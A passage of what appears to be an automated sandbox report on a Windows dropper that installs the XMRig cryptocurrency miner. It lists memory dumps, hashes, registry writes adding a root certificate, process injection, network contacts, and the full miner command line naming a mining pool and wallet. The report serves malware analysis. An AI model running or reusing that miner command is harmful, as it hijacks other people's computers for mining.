| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1980-16-0x000002184BFA0000-0x000002184BFC0000-memory.dmp
memory/1980-17-0x000002184BFF0000-0x000002184C010000-memory.dmp
memory/1980-18-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-20-0x000002184C030000-0x000002184C050000-memory.dmp
memory/1980-19-0x000002184C010000-0x000002184C030000-memory.dmp
memory/1980-21-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-22-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-25-0x000002184C030000-0x000002184C050000-memory.dmp
memory/1980-24-0x000002184C010000-0x000002184C030000-memory.dmp
memory/1980-23-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-26-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-27-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-28-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-29-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-30-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-31-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-32-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-33-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-34-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-35-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-36-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-37-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-38-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-39-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-40-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-41-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-42-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-43-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-44-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-45-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-46-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-47-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-48-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-49-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-50-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-51-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-52-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-53-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-54-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-55-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-56-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-57-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-58-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-59-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-60-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-61-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-62-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-63-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-64-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-65-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-66-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-67-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-68-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-69-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-70-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-71-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-72-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-73-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-74-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-75-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-76-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-77-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-78-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-79-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-80-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-81-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-82-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-83-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
memory/1980-84-0x00007FF64CBE0000-0x00007FF64D6E3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3932 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3932 wrote to memory of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2920-16-0x0000025CDD340000-0x0000025CDD360000-memory.dmp
memory/2920-17-0x0000025CDEB40000-0x0000025CDEB60000-memory.dmp
memory/2920-18-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-19-0x0000025CDEB60000-0x0000025CDEB80000-memory.dmp
memory/2920-20-0x0000025CDEB80000-0x0000025CDEBA0000-memory.dmp
memory/2920-21-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-22-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-23-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-24-0x0000025CDEB60000-0x0000025CDEB80000-memory.dmp
memory/2920-25-0x0000025CDEB80000-0x0000025CDEBA0000-memory.dmp
memory/2920-26-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-27-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-28-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-29-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-30-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-31-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-32-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-33-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-34-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-35-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-36-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-37-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-38-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-39-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-40-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-41-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-42-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-43-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-44-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-45-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-46-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-47-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-48-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-49-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-50-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-51-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-52-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-53-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-54-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-55-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-56-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-57-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-58-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-59-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-60-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-61-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-62-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-63-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-64-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-65-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-66-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-67-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-68-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-69-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-70-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-71-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-72-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-73-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-74-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-75-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-76-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-77-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-78-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-79-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-80-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-81-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-82-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-83-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
memory/2920-84-0x00007FF6EC440000-0x00007FF6ECF43000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a